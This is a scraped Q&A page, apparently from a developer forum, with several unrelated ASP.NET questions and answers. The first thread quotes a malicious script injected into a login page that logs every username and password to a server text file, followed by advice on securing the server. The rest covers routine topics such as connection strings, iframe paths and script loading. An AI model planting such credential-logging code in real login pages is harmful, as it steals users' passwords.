Yesterday my web application has been changed by a virus, who edited the login page. When I opened the aspx file I came across the following script:
<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(#"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
{
file.WriteLine(username.Text + "|" + password.Text);
}
}
</script>
Does anyone know how to not allow this?...
Best practice is to Precompile your views and code behind files on production environment.
http://msdn.microsoft.com/en-us/library/vstudio/bb398860(v=vs.100).aspx
Anyone who can modify the aspx pages can also replace the assemblies in your bin folder. The correct thing to do is to secure the web server.
Related
I have faced an issue while deploying a web application(asp.net c#, in IIS). What I have is single application for two DBs. So, Through querystring, I am determining the connectionstring in the master page.
My problem,is that I have two links each with separate QSs and when clicked, should lead to the corresponding version of the same application.Which is fine, for now when used one at a time. But when used side by side, they are producing the same DB application, as a replica of the first opened URL (which I guess is based on the server session).
Any suggestion on how to achieve this? Appreciate your help. Thanks!
I'm assuming that the idea at the moment is user will click the link on a page and this will redirect them to another page and on this page create the database connection based on the querystring.
Why not store the link clicked in a session variable, which you can then access on the page you're redirected to and create the DB link from that. If you're using a link button or something like that you could do:
Main Page
ASP.NET:
<asp:LinkButton ID="lnkButton1" Text="Link Button 1" OnClick="lnkMyButton_Clicked" runat="server" />
<asp:LinkButton ID="lnkButton2" Text="Link Button 2" OnClick="lnkMyButton_Clicked" runat="server" />
C#
protected void lnkMyButton_Clicked(object sender, EventArgs e)
{
LinkButton lnkButton = (LinkButton)sender;
Session["LinkID"] = lnkButton.ID;
Response.Redirect("MyNewPage.aspx");
}
On your new page:
protected void Page_Load(object sender, EventArgs e)
{
string LinkID = Session["LinkID"];
if(!String.IsNullorEmpty(LinkID))
{
if(LinkID == "lnkButton1") //create connection if first link clicked
else if(LinkID == "lnkButton2") //create connection if second link is clicked
else //handle error
}
else //handle null or empty string
}
I've not tested this, but let me know if it doesn't work.
I have to display a pdf file in an iframe control in .net web application.But when I run the application it could not load the pdf file in an iframe control. I don't know the reason for this...
This is my code...
aspx code :
<iframe id="frmWord" runat="server" style="height: 500px; width: 500px;"></iframe>
C# Code :
protected void Button1_Click(object sender, EventArgs e)
{
frmWord.Attributes.Add("src", Server.MapPath(#"~/iplt20.pdf"));
}
my pdf file is physically located in my project folder like below:
D:\vs-2010projects\rti_chk\rti_chk\iplt20.pdf
I have tried in ie,firefox,chrome also...
If firefox, inside iframe control it says "The address wasn't understood Firefox doesn't know how to open this address, because the protocol (d) isn't associated with any program."
Please guide me to get out of this issue...
User cannot drectly access local paths on server.
instead of d:\path_to_file you should produce something like http://youdomain.com/path-to_file
so
protected void Button1_Click(object sender, EventArgs e)
{
var fullPath = ResolveUrl(filePath); // this could work instead of string concat
//var fullPath = String.Format("{0}/{1}",serverpath,filepath);
frmWord.Attributes.Add("src", fullPath);
}
I have a website and as one of security options (prevent path traversal) I am planning to use a white list of pages which can be accessed. But my problem is I don't know how to do it. Can you share some articles or simple of code how to create a white list?
How many pages does the site have? If there are not too many pages and if pages are not added/removed frequently you can manually create a list of pages. If you are using master pages you can set this up in Page_Load method.
protected void Page_Load(object sender, EventArgs e)
{
if (!Page.IsPostBack)
{
Dictionary<string,string> allowedUrls = LoadAllowedURLs();
if (!allowedUrls.ContainsKey(Request.Path))
{
Response.Redirect("Some_default_redirect_page.aspx");
}
}
}
Now, if you do have a lot of pages you would need more sophisticated solution that uses web.config and moreā¦
If I understand the question correctly, you would like to allow certain users access to certain pages on your website - have you considered ASP.NET Security Trimming?
I am using [script.js][1] as async script loader along with my master page. The pages on the root are working fine using the master page file as it's master page. When it comes to web pages that are inside folders like below then the path does not work fine. Script loader loads the files from wrong url. How do i make it load from correct url regardless of the path.
Admin
-users
-createuser.aspx
The contents of the loader file
//show the path to load scripts files from
$script.path("/js/");
//load jquery first and then load the dependent scripts
$script.order(["jquery.min","slider"],function(){
//load the application specific file
$script("app");
});
how do i get the path to web application on client side for example path should resolve to
http://domainname/virtualdirectory/js/
Are you looking for somthing like this?
<%= Page.ResolveClientUrl("~/Scripts/test.min.js") %>
This will resolve the url for you from the HTML side. I am not familiar with $script.path, but I am wondering if you can do somthing like $script.path('<%=Page.ResolveClientUrl("~/Scripts/test.min.js") %>');
It seems like $script.path("~/js"); would be better. Also, please, write down the wrong path here, i'll try to guess why it is wrong
try this out:
Code Behind:
protected void Page_Load(object sender, EventArgs e)
{
string script;
script = "function getURL(which){ if(which=='1') { return '" + ResolveUrl("~/Default.aspx") + "'; } }";
ClientScript.RegisterClientScriptBlock(this.GetType(), "MyFunction", script, true);
}
JAVASCRIPT-With JQuery:
<script language="javascript" type="text/javascript">
$(document).ready(function () {
alert(getURL('1'));
});
</script>
you will have to know which URL to load, but it works like a charm. Good luck!
I have default.aspx with a "Submit" Button and a code behind function called as "btn_Submit" which will perform submit action. Once I deploy the application and if there is any logical problem in btn_Submit code, then I can use runat=server script in default.aspx file and I need not go for another deployment.
But When I tried the same for ascx file, it works very well in development environment i.e in VS but when I move the same to Test server, system throws function not defined. I have renamed the existing function name.
So is it possible to add runat=server script and add c# code in ascx file?
Yes it is possible..
You have to surround your code with markup
<script language="c#" runat="server">
public void Page_Load(object sender, EventArgs e)
{
//hello, world!
}
</script>
Take a look to thisquestion! I think it will help you..
But it is really better to separate your code..
Did you tell the button which method to run on submit? With "auto event wireup" it will try to find a "buttonname_Click" method if you didn't specify anything. If that doesn't exist, you will get an error.
To call a method with a different name, specify that in the OnClick property of the button.
I am not sure why this happened and still was not able to solve it, So redeployed the application :(